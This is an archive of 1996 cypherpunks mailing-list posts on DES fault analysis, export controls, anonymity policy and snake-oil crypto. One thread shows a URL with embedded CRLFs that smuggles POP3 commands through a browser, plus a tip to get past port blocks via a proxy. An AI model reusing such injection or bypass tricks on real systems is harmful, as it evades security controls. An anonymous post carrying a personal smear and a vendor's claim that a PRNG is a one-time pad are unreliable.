with random single-faults in all the rounds.

This attack finds the last subkey.  Once this subkey is known, we can
proceed in two ways: We can use the fact that this subkey contains 
48 out of the 56 key bits in order to guess the missing 8 bits in
all the possible 2^8=256 ways. Alternatively, we can use our knowledge
of the last subkey to peel up the last round (and remove faults that 
we already identified), and analyse the preceding rounds with the same 
data using the same attack. This latter approach makes it possible to
attack triple DES (with 168 bit keys), or DES with independent subkeys
(with 768 bit keys).

This attack still works even with more general assumptions on the
fault locations, such as faults inside the function F, or even faults
in the key scheduling algorithm.  We also expect that faults in
round 13 (or even prior to round 13) might be useful for the analysis,
thus reducing the number of required ciphertext for the full analysis.

OTHER VULNERABLE CIPHERS

Differential Fault Analysis can break many additional secret key 
cryptosystems, including IDEA, RC5 and Feal.  Some ciphers, such as 
Khufu, Khafre and Blowfish compute their S boxes from the key material.  
In such ciphers, it may be even possible to extract the S boxes
themselves, and the keys, using the techniques of Differential Fault
Analysis.  Differential Fault Analysis can also be applied against
stream ciphers, but the implementation might differ by some technical
details from the implementation described above.





------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Fri, 18 Oct 1996 12:29:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: news item on Atlanta bank
Message-ID: <Pine.OSF.3.91.961018153037.5149A-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


  from:
  [http://netday.iworld.com/news1.shtml]

  news@iworld.com
  
  "CyberBank" Opens for Business
  
  [October 18] -- Atlanta Internet Bank reports its
  cyberdoors are open for business as the world's first
  Internet-only bank.
  
  Currently available to AT&T WorldNet Service
  subscribers, Atlanta Internet Bank's initial products
  include interest-bearing checking accounts, direct
  deposit, electronic bill payment, account transfer
  capability, and ATM cards.
  
  The bank has announced the launch of its "anytime-
  anywhere" service with special interest rates on
  money market accounts. For a limited time, Atlanta
  Internet Bank is offering 7% interest (annual
  percentage yield of 6.18%) on NetVantage money market
  accounts to WorldNet subscribers.
  
  "This is the beginning of a new era in financial
  services," said Atlanta Internet Bank President Don
  Shapleigh. "We're using bits and bytes instead of
  bricks and mortar and passing the savings on to our
  customers. This will allow us to maintain very
  competitive rates after the introductory
  rate offer expires."
  
  Future services planned by the new bank include loan
  products, brokerage services, IRA accounts, and
  credit and debit cards.
  
  "Atlanta Internet Bank has taken a giant step into
  the electronic commerce marketplace," said Jeffrey
  Feldman, AT&T's Advanced Network Solutions vice
  president. "AT&T's Advanced Network Solutions team
  firm believes that banks and other financial service
  providers will win customer loyalty by offering their
  own branded, electronic environments that deliver
  real value to end users--just as Atlanta Internet
  Bank has demonstrated."
  
  Atlanta Internet Bank's services are provided through
  Carolina First Bank, Greenville, S.C., a wholly owned
  subsidiary of Carolina First Corporation.with
  multiple providers to achieve our strategic goals."

--
to unsubscribe from cypherpunks, send to majordomo@toad.com
                  unsubscribe cypherpunks
        in the message body, not the Subject: line




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Fri, 18 Oct 1996 16:46:19 -0700 (PDT)
To: interesting-people@cis.upenn.edu, cypherpunks, gnu
Subject: Re: IP: - Biham/Shamir Differential Fault Analysis of DES, etc
In-Reply-To: <3.0b36.32.19961018135058.0076412c@linc.cis.upenn.edu>
Message-ID: <199610182345.QAA20225@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Note that this attack requires physical access to the DES chip, to
stress it so it will fail.  It works great against "tamper-proof"
devices such as smart cards.  It doesn't work against encryption
happening at any distance from the attacker (e.g. across the network).
It doesn't work against stored information like PGP-encrypted
email messages either.

However, it might be possible to use the attack by beaming disruptive
energies (heat, electrons, microwaves, etc) at a computer which is
doing a lot of encryption, while simultaneously monitoring that
computer's activity across a network.

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 18 Oct 1996 13:47:10 -0700 (PDT)
To: trei@process.com>
Subject: Re: POTP critques?
In-Reply-To: <199610181356.GAA10935@toad.com>
Message-ID: <Pine.LNX.3.95.961018163224.621A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 18 Oct 1996, Peter Trei wrote:

> I'm looking for independent critiques of the system, something
> better than 'it's not really a one-time pad.' Is the cryptosystem
> which is actually implemented worth a damn? Does their claim
> to have solved the key distribution problem hold water? I
> seem to remember something about them wanting to
> generate keys for you, and ship them to the customer. Is this
> correct?

POTP is a stream cipher where the key is derived from a "state" and bits from
the ciphertext chosen using the current state.  Two machines have to
synchronize their states before encryption can take place.  The key is derived
from a one-way function performed on the state.  This really doesn't solve the
key distribution problem because initial synchronization has to take place on
a secure channel.  The current state also has to be saved on each machine.
I think the "escrow" system you are referring to is some other encryption
program.

Elementrix does acknowledge that they have a stream cipher and don't refer to
it as a one-time pad.  The only reason OTP is in the name is that the key
derived from the state is as long as the ciphertext being encrypted.  They
claim that the state is larger than the key and it is computationally
infeasible to derive the state given the key.  I would guess that the size of
the next state is determined by the size of the plaintext to be encrypted.

As for security of the system, I really don't know.  Their algorithm is
proprietary so I would avoid it for that reason alone.  They have not yet
gotten any comments regarding security from any cryptographers.  The entire
security of this system is based upon the algorithm used to generate the state
from a previous state and the one-way function used to generate the session
key.  Unless they are using a hash algorithm like SHA-1 to generate the keys
and states, I would seriously question the security of it.

Mark
- -- 
finger -l for PGP key
PGP encrypted mail prefered.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMmfs0CzIPc7jvyFpAQE1QAf9HA/jpe2YZZbKrMjozlNVSqY8pbT4spUf
vdLOkk6DjaKCFPdLdy23SpmlJSqjNVw5rzGV+GwLTESCwxmP3l7foEQ022Zji3of
ly3grbq+3kIOL13cqBFZwYz2nrSmJJggNo+FdxjWlSJagoPZjAhO94+h0EFwTKXs
fahlaQ27om02TWhUHVZxBQ1pKAoB+PFxuzkxAu6zX0fOj9ZG/bZGZ4HbV4UxUl9h
O0VNuyAjCeGVwOZ+GvTs5G5h4EBRGrgHusRNAlLhSnsfFjaM3pYu1ZI5123VKQLC
By30qqSjfjKNizLBTZnNIVvmI12TIKvWvEPmihn8atowvVJ4TcbKYw==
=hgmm
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Fri, 18 Oct 1996 16:50:14 -0700 (PDT)
To: geoff@tidbits.com
Subject: Your editorial in the 10/14 PCWeek
Message-ID: <v03007816ae8dc774ee80@[207.67.246.99]>
MIME-Version: 1.0
Content-Type: text/plain


Geoff --

I never did finish that article for you about the Apple crypto alliance, but here's something you moght like.
I will be out this weekend. If you have any questions, email; I will respond Sunday night.
[ PS. This may appear in the 10/21 PC Week. ]

On the other hand, it may be too esoteric for TidBITS....
-------------
Mr Gibson --

I'm afraid that I must disagree with your editorial in the October 14th issue of PC Week titled "Encryption Law Change: Good News" <http://www.pcweek.com/opinion/1014/14edit.html>. This is not a good change, but rather another attempt by the government to get it's "key escrow" (now renamed 'key recovery') agenda added to commercial software products.

Let's start with the facts. 

A) This is not a change in the law. There is no law regarding export of encryption software.
Congress has never passed any such law. These are State Department regulations, and presidential decrees. These regulations, which have the force of law to you and me, were never debated or voted upon by our elected representatives. They can be changed tomorrow the same way. In fact, they can be changed and the public need not even be notified.


B) The Clinton administration agreed to allow the export of unescrowed encryption that used 56 bit keys for six months (with up to three six month renewals) on the following conditions:
	1) That the companies shipping the software agree (in principle) to incorporate 'key recovery' features in their software.
	2) That the companies shipping the software make status reports to the government every 6 months as to their progress towards a key recovery scheme. If they are making satisfactory progress, their export license will be renewed for another six months.
	3) That after two years, they discontinue selling their 56 bit software, and only sell the 'key recovery' software.

Condition #1 is what the Clinton Administration has been fighting for since 1993 when it first announced the Clipper chip, the ability to recover the plaintext of any encrypted communication.

Condition #2 puts these companies at the mercy of a government panel which will decide, every six months, whether or not an internal project is proceeding 'satisfactorily'. If not, the company will be unable to sell its' encryption products abroad. This is a _big_ stick that the government can use to influence companies' actions.

Condition #3 requires the companies to obsolete their products in two years, because they will no longer be able to sell the "unescrowed" software abroad, and because one of the goals of "key recovery" is that it will not interoperate with software that does not support "key recovery".


B)
Your editorial states:
>Previous administrations have turned a deaf ear to industry pleas, as 
>had the Clinton administration for three and a half years. Until now, 
>the White House has toed the line drawn by law enforcement officials, 
>which equated powerful encryption technology with munitions. Now, the 
>administration has, under high-tech standard-bearer Vice President Al 
>Gore, done a complete about-face. 
>
Even if this was, as you wrote, a "complete about face", and there were no other conditions (such as key recovery)  involved, it would still be inadequate. A paper written this year by a group of noted cryptologists titled "Minimal Key Lengths for Symmetric Ciphers to Provide Adequate Commercial Security" recommends that the minimum key length for security today was at least 75 bits, and for data that needs to be secured for the next twenty years, at least 90 bit keys should be used.

The entire paper is availiable at <ftp://ftp.research.att.com/dist/mab/keylength.txt> (ASCII) and <ftp://ftp.research.att.com/dist/mab/keylength.ps> (PostScript). It is fascinating reading.


You also wrote:
>The administration plan also calls for private companies to surrender 
>encryption keys should court orders demand them. 
>
This is incomplete and misleading. The original Clipper press release, (availiable at <http://www.epic.org/crypto/clipper/white_house_statement_4_93.txt> ) states:

>Q:   Suppose a law enforcement agency is conducting a wiretap on
>     a drug smuggling ring and intercepts a conversation
>     encrypted using the device.  What would they have to do to
>     decipher the message?
>
>A:   They would have to obtain legal authorization, normally a
>     court order, to do the wiretap in the first place.  They
>     would then present documentation of this authorization to
>     the two entities responsible for safeguarding the keys and
>     obtain the keys for the device being used by the drug
>     smugglers.  The key is split into two parts, which are
>     stored separately in order to ensure the security of the key
>     escrow system.
>
Please note the word "normally".
The Clinton Administration, even though repeatedly asked, has never explained what consitutes an abnormal case, and what they would consider authorization in that case.
This was not a typo. This Q&A was part of an official White House press release.

C) What exactly is "key recovery"? How does it work?
No one knows. The White House press release doesn't say. The idea is that the 11 vendor coalition will work out the methodology, and the White House will "approve" it. This is, in my mind, one of the slickest moves in the whole situation. The administration has taken a problem that they have been unable to solve to the satisfaction of the computer industry (access to all encrypted communications), and suddenly, it's not the administration's problem any more! It's the computer industry's problem!

From an article in a recent ComputerWorld: (<http://www.computerworld.com/search/AT-html/9610/961014SL42crypto.html>)

>And speaking of failures to communicate, take IBM, which recently teamed 
>with 10 companies to develop technology for a "key-recovery" system 
>intended to satisfy the new export criteria.
>
>Through some mysterious process, the scheme will allow the government to 
>get encryption keys when it needs them, without having to hold them "in 
>escrow" the Clipper approach.
>
>Why "mysterious? IBM's press release announcing the initiative was four 
>pages of self-congratulatory drivel with almost no information about 
>what the companies would develop or how it would work.
>
>Reminded of the secret Clipper algorithm, I sought details from IBM. I 
>asked a spokeswoman why the company hadn't just put out a nice, snappy 
>white paper explaining its new approach to key recovery.
>
>"We spent three months trying to do that, quite literally," the 
>spokeswoman said. "It's pretty confusing stuff, and whenever we get it 
>on paper, we aren't happy with it."
>

> Observers believe that if the 56-bit experiment proves successful, 
>relaxation of the restriction that still covers 128-bit key software 
>will follow. This could take place two years hence.
>
Who are these "observers"? They don't seem very observant to me.

The government has stated that the export of unescrowed 56 bit encryption software is a temporary measure, and will be prohibited again (at the very latest) on Jan 1, 1999. At that time, the only (medium or) strong encryption software that will be allowed to be exported will be that which supports "key recovery".


In conclusion, this is not a "refreshing change of direction" for the Clinton administration.  This was "more of the same", albeit better disguised. The 11 companies who signed up for this coalition are receiving very little (56 bit export for at most two years), in exchange for giving up control of their encryption technologies to the government forever.

--------------

-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"It is not the function of our Government to keep the citizen from falling
into error; it is the function of the citizen to keep the Government from
falling into error."
--Justice Robert Jackson, _American Communication Association v Douds_,
343 U.S. 306, 325 [1952] [via ed.nelson@SYSLINK.MCS.COM]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WEB Tech #5 <webtech5@rollerblade.com>
Date: Fri, 18 Oct 1996 16:02:13 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: Attention Random Nerd!!!
Message-ID: <c=US%a=_%p=Rollerblade._Inc%l=EXCHANGE-961018224007Z-6@mail.rollerblade.com>
MIME-Version: 1.0
Content-Type: text/plain


Don't worry.  We haven't forgot about you.  You can expect a detailed
response to your inquiry on Tuesday.  Thanks for your patience.  

Webtech5
Rollerblade Consumer Service




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "! Drive" <drink@aa.net>
Date: Fri, 18 Oct 1996 18:22:35 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Re: Production of ALPHACIPHER Snake Oil Cancelled!
Message-ID: <199610190100.SAA08881@big.aa.net>
MIME-Version: 1.0
Content-Type: text/plain


: From: Timothy C. May <tcmay@got.net>
: At 9:11 PM -0700 10/17/96, ! Drive wrote:
: >This may have already been posted, but I found it interesting...
: >
: >from: http://www.aa.net/cyber-survival-hq/
: >
: >     Development of the ALPHACIPHER product line has been voluntarily
: >cancelled
: >due to the possibility of
: >                 non-compliance of users of ALPHACIPHER with the new key
: >escrow
: >law.
: 
: 
: And just which _law_ might that be? Care to name an Act? Or even a Bill?
	I don't know, I'm only affiliated by the ISP, goto the page and find a mailto
link and ask the owner.
: 
: Come to think of it, just what the hell is "Alphacipher," and why should we
: care?
: 
: 
: >        ALPHACIPHER currently has no built-in key generation function, and
the
: >proposed release of an
: > ALPHACIPHER key generator has been terminated. All purchasers of
ALPHACIPHER
: >are entitled to a complete
: >                               refund, and this has already been done.
: 
: Were there any actual purchasers?
: 
: >         The New ADFGVX cipher is still offered for sale, as it is a
breakable
: >cipher, at least in theory.
	Why would one want to purchase something advertised as breakable?
	'course advertising that its not breakable would would keep me away also.
: 
: Ah, yes, now I understand. Sounds like just a new marketing ploy for the
: same old snake oil.
: 
: --Tim May
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@ACM.ORG>
Date: Fri, 18 Oct 1996 15:28:35 -0700 (PDT)
To: Hal Finney <hal@rain.org>
Subject: Re: Anonymous Auth Certificates [was: Re: Blinded Identities]
In-Reply-To: <199610172233.PAA01850@crypt>
Message-ID: <v03007800ae8db2fd76bc@[168.143.8.144]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:33 -0400 10/17/96, Hal Finney wrote:

>> >> I've been charged with developing an Internet service which needs to
>>assure
>> >> its clients of anonymity.  However, we fear some clients may abuse the
>> >> service and we wish to prevent the abusers from re-enrollment if
>> >> terminated for misbehavior. (In your example, it would be the person(s)
>> >> trying to discover the service host via flood).

>
>I don't see how authorization certificates solve this problem.  How
>would you determine if someone was qualified to receive an authorization
>certificate?  And what would you do to make them stop using the service
>if they abuse it, and to stop them from getting new authorization
>certificates?

You're right.  SPKI doesn't solve the whole problem, by itself.  You do
need to avoid ID certificates in the first place.  They have no use here
because he wants anonymous authorization.  He also wants it blinded.  SPKI
includes a construct for passing some authorization to anything signed by a
given public key.  That gives him his blinding.

However, he has an additional problem.  He's trying to set up what amounts
to a voter registration.  Rather, he appears to hope that someone else will
do so.  AFAIK, there is no currently proposed PKI which will do the (one
body:one valid cert) mapping he's looking for.  However, if he finds some
organization willing to do that, then he can use the SPKI certs to transfer
authorization (e.g., to log in on his service) to a key used for that
purpose by that organization.  Certainly, ID certs from VeriSign or GTE or
anyone else I've heard of don't fill that role.

As a native Chicagoan, I can attest to the difficulty of performing (one
body):(one vote) mappings   :)  [I know -=- slander of my beloved home town]

I'm also not sure we want anyone setting up such a service except for
voting.  There can be very bad societal drawbacks to a service like that.
It might be able to achieve all the evil which we decry when the idea of a
national ID card comes up.

 - Carl


+------------------------------------------------------------------------+
|Carl M. Ellison   cme@acm.org     http://www.clark.net/pub/cme          |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2|
|  "Officer, officer, arrest that man!  He's whistling a dirty song."    |
+-------------------------------------------- Jean Ellison (aka Mother) -+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.net (Ulf Moeller)
Date: Fri, 18 Oct 1996 10:28:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: EU: avoid "safe havens", make remailers traceable
Message-ID: <m0vEIA1-0003KFC@idril.shnet.org>
MIME-Version: 1.0
Content-Type: text/plain


ILLEGAL AND HARMFUL CONTENT ON THE INTERNET

   Communication to the European Parliament, the Council, the Economic
   and Social Committee and the Committee of the Regions.

Table of Contents with some excerpts (full text at
http://www2.echo.lu/legal/en/internet/content/communic.html):

1. The opportunities of the Internet
2. How does the Internet work?
3. Illegal and harmful content on Internet

            It is crucial to differentiate between content which is
            illegal and other harmful content:

 A. Illegal content

            Protection of the public order (child pornography, racist
            hatred, terrorism, fraud), and rights of individuals
            (breach of copyright, libel, invasion of privacy or
            unlawful comparative advertising)

 B. Harmful content

            Material may offend the values and feelings; depends on
            cultural differences.

4. Identifying and combating illegal content on Internet

 A. Technical limits to law enforcement

            Control can really only occur at the entry and exit points
            to the Network. Thus additional international co-operation
            is required to avoid "safe havens" for documents contrary
            to general rules of criminal law.

 B. The role of Internet access providers and host service providers

   i) Legal responsibilities
  ii) Self-regulation
 iii) Removal of files from the servers
  iv) Blocking access at the level of access providers

            Singaporean model is inconceivable for Europe as it would
            severley interfere with the freedom of the individual.
            Practical feasibility remains open to question.

            An approach which involes requiring access providers to
            block access to illegal content on a case-by-case basis
            has been followed recently by law enforcement authorities
            in Germany. A number of anti-blocking tactics were also
            immediately put in place. At the latest count, the
            document is mirrored on 43 WWW sites and 2 newsgroups and
            is available from an e-mail listserver. Upstream blocking
            of sites may therefore present a number of significant
            shortcomings. It may not prevent, in particular, criminal
            users from "hopping" from one Internet mode to the other,
            i.e. from a Web page, to a Usenet newsgroup, to standard
            e-mail.

 C. Anonymous use of the Internet

            Users of the Internet are normally identified. This is
            desirable in accordance with the democratic principle that
            individuals, while free to express their thoughts and
            beliefs, should nevertheless be accountable for their
            actions.

            Law enforcement authorities have expressed concern at
            various techniques which allow anonymous use of the
            Internet. This may facilitate sending illegal content by
            making it difficult or impossible to identify the
            offender. The legitimate need for anonymity should be
            reconciled with the principles of legal traceability. The
            Safety Net proposals take the view that use of truly
            anonymous accounts is a danger, while use of traceable
            pseudonyms is not. They propose measures to close known
            loopholes and improve traceability and that anonymous
            remailers record details of identity. These details would
            be subject to data protection legislation. The question of
            legal traceability needs work both on technical issues
            and on global co-operation in order for measures to be
            effective.

 D. Judicial and police co-operation at EU and international level

5. Dealing with harmful content on Internet

 A. The principle of freedom of expression

            The right to freedom of expression, as affirmed by the
            European Convention on Human Rights, can be subject to
            some conditions, is not absolute and subject to important
            qualifications, for instance permitting licensing of
            broadcasting or cinema enterprises. 

            Any regulatory action intended to protect minors should
            not take the form of an unconditional prohibition of using
            the Internet to distribute certain content that is
            available freely in other media. 

 B. The legal framework of the Internet market

            The measures must be appropriate to achieve the pursued
            objective and may not exceed what is necessary to achieve
            their aim.

 C. Parental control software: empowering parents to protect minors

            Useful as a "line of defence" at the end-user level,
            filtering software can also be applied at various
            stages in the transmission process, for example by
            host service providers or access providers.

 D. PICS: a global industry standard
 E. The extent to which filtering can be used
 F. European rating systems
 G. Educating the public

6. Policy options/conclusions
 1. Illegal content
    a) Co-operation between Member States
    b) Liability of access providers and host service providers

            Need for a common European framework to clarify the
            administrative rules and regulations which apply to access
            providers.

    c) Encourage self-regulation
 2. Harmful content

            Encourage the use of filtering software such as PICS.

 3. INTERNATIONAL ISSUES
    a) An International Conference

            At the Industry Council of 8 October 1996, the invitation
            by Germany to host an International Conference was
            accepted. This will involve representatives of
            law-enforcement authorities, together with representatives
            of providers and users: Discussion on the possibility of an
            international convention on illegal and harmful content.
       
    b) Extension of the dialogue

 4. Support actions
   a) Transparency mechanism
   b) Information Web site




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amnesia@chardos.connix.com (Anonymous)
Date: Fri, 18 Oct 1996 16:30:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [IMPORTANT] Firewalls
Message-ID: <199610182321.TAA06682@chardos.connix.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C[reep] May has been fired from Intel for 
stealing office supplies.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Fri, 18 Oct 1996 12:17:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [NOISE::SECURITY] Disabled ports in Navigator
In-Reply-To: <3.0b36.32.19961017221127.00691b88@gateway.grumman.com>
Message-ID: <199610181916.VAA25926@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Rick Osborne <osborne@gateway.grumman.com> wrote:

> I was thinking about how to fix a sendmail program for our server when the
> (most likely unoriginal) thought cam to me:  why not use your web broser as
> a telnet tool?  You could embed CRLFs into the request field and the
> receiving program would just throw the GET /[etc] out like I messed up or
> something.  I could then add subsequent logins & commands to my heart's
> content (or the string length of that particular browser's request field).
> Being behind a firewall, I tend to think of these things. The only problem
> would be with the fact that no EOL is ever sent, but with a good browser
> that displays as content is streamed, you wouldn't have to worry about that.
> 
> Like I said, I doubt it's original because when I tried to do it in
> Navigator I get a
> 
> Sorry, Access to the port number given has been disabled for security
> reasons.
> 
> error dialog.  I got this for all of the obvious ports (21,25,110, etc).
> 
> I only have 3.0 on my machine, so I don't know if it works with previous
> versions.  MSIE3 doesn't disable the ports, but it doesn't start displaying
> anything (it suffers from the stupidity of not displaying as it streams).
> 
> Has anyone else personally tried this?  My original idea was to see my home
> email, with something like:
> 
> http://mail.here.com:110/user%20me%0D%0Apass [... etc]
> 
> Any comments, suggestions, etc?

This was discussed a bit here on the list when Netscape first did it, which
was in either v2.01 or v2.02.  At the time, I thought about writing a patch
to fix the problem, but decided there was really little purpose in trying
to talk http to sendmail, so I didn't bother.

In any event, the blocking is in netscape itself and not in the proxy
server, so you could just telnet to your proxy on port 80, and issue the
commands to connect to whereever you want.

You could also look for a program called webex, it's a cgi script which
generates html forms on the fly, allowing you to read your mail in your
web browser.

I feel I should point out that accessing your mail in an unencrypted
fashion, through a possibly untrusted proxy server is quite insecure and 
not generally advisable.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clint Barnett <cbarnett@eciad.bc.ca>
Date: Sat, 19 Oct 1996 10:37:04 -0700 (PDT)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: NSA/GCSB spying shown on NZ television [RANT]
In-Reply-To: <32608A7B.4F66@gte.net>
Message-ID: <Pine.SGI.3.91.961018213534.21020A-100000@oswald>
MIME-Version: 1.0
Content-Type: text/plain



It was not my intention to discredit the theory, in fact I believe I 
mentioned that in my original "e". When Canada changed to the Metric 
system, I went along with it, what could I do? Politicians raise my 
taxes, and I bear that burden as well. I don't like it, but I also take 
whatever I can get through the system. Ripping off the system by using 
the system is one of the best ways to get the system changed. If I went 
into a restaurant with an automatic weapon because I didn't like the way 
they were destroying the rainforests,it would get me on the evening news as 
a crazed gunman, not as somebody who likes trees. If you think thatyou 
can resist the NSA and win, more power to you, and I'll help if I can, but 
I don't think you can.However, I strongly believe that you have the power 
to limit the information they steal from you, and thereby limit the 
control they have over you. If you can keep your wits about you, act fast 
when you have to, and run away to fight another day, then you can maybe 
do some good, but don't make a martyr of yourself or anyone else, because 
martyrs can't write code, they can't attack or defend a system, they can 
only lay there and rot in jail or in the ground. 

clint barnett
lord of the cosmos
emily carr institute





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Sat, 19 Oct 1996 10:38:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Q.E.D. reply to petty MESSger
Message-ID: <Pine.BSI.3.95.961018221413.16111B-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




To: perry@piermont.com
Subject: Q.E.D. reply to petty MESSger 


> 
> IPG Sales writes:
> >          Some of you have sardonically written to say "Nihil Est
> >          Demonstrandum," N.E.D. because an OTP must be derived from a
> >          hardware source, that is, it must be a pure random sequence
> >          of limitless entropy. Accordingly, they unbashfully assert
> >          that an OTP generated by a computer program is not possible.
> > 
> >          How do they know that? Does the Bible tell them so, or the
> >          Koran, or do they get it from the Torah? Why not cite the
> >          source of their certainty instead of advancing an unsupported
> >          proposition.
> 
> See Claude Shannon's papers on information theory. [Available as: C.E.
> Shannon, Collected Papers: Claude Elmwood Shannon, N.J.A. Sloane and
> A.D. Wyner, eds., New York: IEEE Press, 1993.]
> 
> Shannon invented information theory in 1948 and 1949. Part of his
> papers discuss the information theory of cryptosystems. He
> mathematically proved that only a O.T.P. using non-reused physically
> random numbers could provide what he termed "perfect secrecy".  I
> accept mathematical proofs above the Koran or the Bible. (The Torah is
> a subset of the Bible.)

As in so many other cases, you are so F.O.S. that it is
unbelievable. Your eminence pontificating about it does make
it true. Furthermore, Shannon certainly did not prove that
physically random numbers are required to provide what he termed "perfect
security." I believe that closer reading and interpretation will reveal
that what he was saying was that any mathematical series other than truly
random numbers can theoretically be reconstructed by some means, including
brute force, should that be required.  Obviously that is true.

I do not disagree with the fact that brute force can be used to
attack the algorithm that I have advanced. It you try all of the
possible OTPs, PRNG encryptor streams, against the ciphertext, then only
a limited few and maybe only one meaningful plain text can be obtained.
There is absolutely no dispute about that. Accordingly, Shannon
is quite correct in saying that it is not "perfect." It is not perfect in
a mathematical sense, and in that limited sense only, you are correct.
However to try all possibilities, is mathematically impossible - thus the
algorithm must be attacked analytically - as EVEN you, or anyone else,
will be able to clearly see, if you examine the algorithm, it cannot be
attacked analytically. 

My algorithm most certainly does NOT produce a theoretical pure Random
Number Stream, accordingly it is a PRNG, but it most certainly does
produce an OTP that meets each and every requirement of such, other
than some theoretical definition that you seek to impose on it by your
dogmatic words. You do not have to take my word for it, the FULL
ALGORITHM, which has never before been published, is set out on our web
site.  

There is no mathematical proof that my PRNG streams are not an OTP -
because they are OTPs. There are 156.8816 megabytes of raw encryptor
stream data at our site. They constitute 10 OTPs, all using the same key,
only the message numbers vary.but with different message numbers only.
> >          I do not mean to be rude,
> 
> You are anyway.
> 
You are so vane, so crass, so dogmatic, so blinded by your opinions,
that you obviously look at yourself in the mirror wheneever given the
opportunity. You do niot know what the hell you are constantly
pontificating about. talking aboutand including the one under discussion
herein. Why not show everyone your prowess by telling us what the key and
the As, Bs, and Cs, are they were used to generate the 156.8816 megabytes
referred to above. Of course, you cannot, so you bray like an ass to cover
up your crypto impotence.

> >          but excuse me, what
> >          scientific proof can they offer for that immovable avowal?
> 
> See above.
  See above
> 
> >          There is no scientific proof whatsoever, none at all,
> 
> See above.
 See above
> 
> >          except
> >          for the words and their steadfast, and maybe self serving,
> >          postulate.
> 
> See avove.
See above and below
> 
> >          Accordingly, obviously it is they, not us, who are
> >          the ones that have "Nihil Est Demonstrandum," in this matter.
> 
> See above.
See above
> 
> >          There is not one scintilla of sustainable evidence to support
> >          such a doctrine.
> 
> See above.
See above and below.
> 
> >          While the vast majority of people knowledgeable about
> >          cryptography have not heretofore believed that it is possible
> >          for software to produce an OTP,
> 
> It is not possible. 
It is absolutely possible, Q.E.D.

> 
> The information content, or entropy, of the key stream is necessarily
> no larger than its keyspace. That is, if you have a software
> pseudo-random number generator using an N bit seed, the entropy of the
> keyspace is necessarily never greater than N. This is mathematically
> certain -- no amount of prayer on your part can change that.
> 
> >          that does not make it a
> >          scientific fact,
More of your meaningless B.S. - Obviously you wrote your reply before
you read my entire message.

> 
> Sorry, its even better -- a MATHEMATICAL fact.
> 
You saying it, like a lot of other supercilious crap that oozes out of
you brain as "write bites," does not make it so. All kinds of crap is
running loose up there, you need to get it under control someway. 

It is absolutely not perfect in the Shannon sense, but it does not have to
be theoretically perfect to fulfill the requirement of being an OTP. You
definition of an OTP, or a OTP as you mistakenly refer to it, is an
extraneous mathematical definition that people have mistakenly
extrapolated from Shannon.   

> >          In support of their position, some have pointed out that John
> >          von Neumann, to paraphrase, stated that ARITHMETIC cannot
> >          produce random numbers,
> 
> von Neumann meant any deterministic algorithm, actually.
>
There you go again, pulling things out of you crazy hat, head, running
off at the brain again, stating a falsehood and hoping that people will
overlook it. I assume that you held a seance with von Neumann and he told
you that from the great beyond, since that is clearly not what he said. A
careful reading of von Neumann does not reveal that he said one thing and
meant another. He used the word ARITHMETIC, if he meant something else he
world have said so. Furthermore, he was referring random numbers, and to
repeat emphatically, my algorithm is a PRNG, but  it  also happens to be
an OTP, as we can prove. Q.E.D.    
 
> >          We stipulate the obvious fact that the encryptor stream
> >          generated by EUREKA is a PRNG stream, though we do consider
> >          it gross denigration to castigate it as ONLY a PRNG stream.
> 
> If it is a PRNG, you do not have a One Time Pad, period. What you have
> is a stream cipher.
>
It is a stream cipher, but it is also an OTP, just as a hardware sourced
RNG is a stream cipher that is also an OTP.

> 
> Furthermore, past examination has shown you have a POOR stream cipher.
> 
Did you see the movie, Dumb and Dumber - you are obviously getting dumber
and dumber and dumber - would I have come back to you 5 months later with
the same thing - you are obviously brain dead - as I have stated on
numerous occasions, the previous proffer was only a part of the overall
algorithm, to solicit help from some of the cypherpunks, which I did get. 
The so
called breaking with "Known Plain Text," was an absolute farce, it
would have applied to only one message where it could be applied, if at
all - it did not apply to the whole system, each OTP was, and is
completely different - but that is beside the point, we did make some
changes to negate other possible attacks, but those were modest changes.
Any one that looks at the algorithm, which obviously, as a self proclaimed
crypto Diety, you have not deign to do, can determine that it is in now
way what you have looked at before.
 


> >          It is a PRNG issue that also happens to be an extremely well
> >          behaved OTP sequence, with limited but ample entropy, as well.
> 
